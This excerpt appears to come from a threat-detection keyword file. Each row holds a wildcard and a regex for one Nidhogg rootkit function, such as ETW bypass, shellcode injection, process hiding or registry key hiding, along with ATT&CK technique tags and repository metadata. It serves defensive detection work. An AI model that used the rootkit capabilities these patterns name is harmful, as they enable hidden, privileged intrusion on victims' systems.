"*Nidhogg::ModuleUtils::NidhoggETWBypass*",".{0,1000}Nidhogg\:\:ModuleUtils\:\:NidhoggETWBypass.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53351"
"*Nidhogg::ModuleUtils::NidhoggInjectDll*",".{0,1000}Nidhogg\:\:ModuleUtils\:\:NidhoggInjectDll.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53352"
"*Nidhogg::ModuleUtils::NidhoggInjectShellcode*",".{0,1000}Nidhogg\:\:ModuleUtils\:\:NidhoggInjectShellcode.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53353"
"*Nidhogg::ModuleUtils::NidhoggPatchModule*",".{0,1000}Nidhogg\:\:ModuleUtils\:\:NidhoggPatchModule.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53354"
"*Nidhogg::ModuleUtils::NidhoggReadData*",".{0,1000}Nidhogg\:\:ModuleUtils\:\:NidhoggReadData.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53355"
"*Nidhogg::ModuleUtils::NidhoggWriteData*",".{0,1000}Nidhogg\:\:ModuleUtils\:\:NidhoggWriteData.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53356"
"*Nidhogg::ProcessUtils::NidhoggProcessClearAllProtection*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggProcessClearAllProtection.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53357"
"*Nidhogg::ProcessUtils::NidhoggProcessElevate*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggProcessElevate.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53358"
"*Nidhogg::ProcessUtils::NidhoggProcessHide*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggProcessHide.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53359"
"*Nidhogg::ProcessUtils::NidhoggProcessProtect*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggProcessProtect.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53360"
"*Nidhogg::ProcessUtils::NidhoggProcessSetProtection*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggProcessSetProtection.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53361"
"*Nidhogg::ProcessUtils::NidhoggProcessUnhide*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggProcessUnhide.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53362"
"*Nidhogg::ProcessUtils::NidhoggProcessUnprotect*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggProcessUnprotect.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53363"
"*Nidhogg::ProcessUtils::NidhoggQueryProcesses*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggQueryProcesses.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53364"
"*Nidhogg::ProcessUtils::NidhoggQueryThreads*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggQueryThreads.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53365"
"*Nidhogg::ProcessUtils::NidhoggThreadHide*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggThreadHide.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53366"
"*Nidhogg::ProcessUtils::NidhoggThreadProtect*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggThreadProtect.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53367"
"*Nidhogg::RegistryUtils::NidhoggRegistryClearAll*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryClearAll.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53368"
"*Nidhogg::RegistryUtils::NidhoggRegistryHideKey*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryHideKey.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53369"
"*Nidhogg::RegistryUtils::NidhoggRegistryHideValue*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryHideValue.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53370"
"*Nidhogg::RegistryUtils::NidhoggRegistryProtectKey*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryProtectKey.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53371"
"*Nidhogg::RegistryUtils::NidhoggRegistryProtectValue*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryProtectValue.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53372"
"*Nidhogg::RegistryUtils::NidhoggRegistryQueryHiddenKeys*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryQueryHiddenKeys.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53373"
